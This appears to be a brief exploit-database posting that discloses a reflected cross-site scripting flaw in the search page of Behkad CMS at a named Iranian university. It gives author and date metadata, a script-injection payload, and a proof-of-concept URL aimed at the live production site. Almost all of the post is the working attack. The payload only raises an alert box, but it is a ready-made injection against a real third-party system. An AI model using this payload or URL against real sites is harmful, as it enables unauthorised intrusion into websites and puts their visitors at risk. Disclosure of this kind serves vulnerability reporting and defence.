========================================================= # Exploit Title: Behkad CMS - Technical And Vocational University Yazd / Iran - Cross-Site Scripting (XSS) # Google Dork: - # Date: 2022-03-06 # Exploit Author: Mr.B3nY # Vendor Homepage: www.behkad.tvu.ac.ir # Tested on: Parrot OS # Vulnerability : Cross-Site Scripting (XSS) ========================================================= [+] PAYLOAD :- "<script>alert('PAYLOAD')</script>&no=search" ========================================================= [+] POC :- https://www.behkad.tvu.ac.ir/search.php?q=<script>alert('XsS By Mr.B3nY')</script>&no=search =========================================================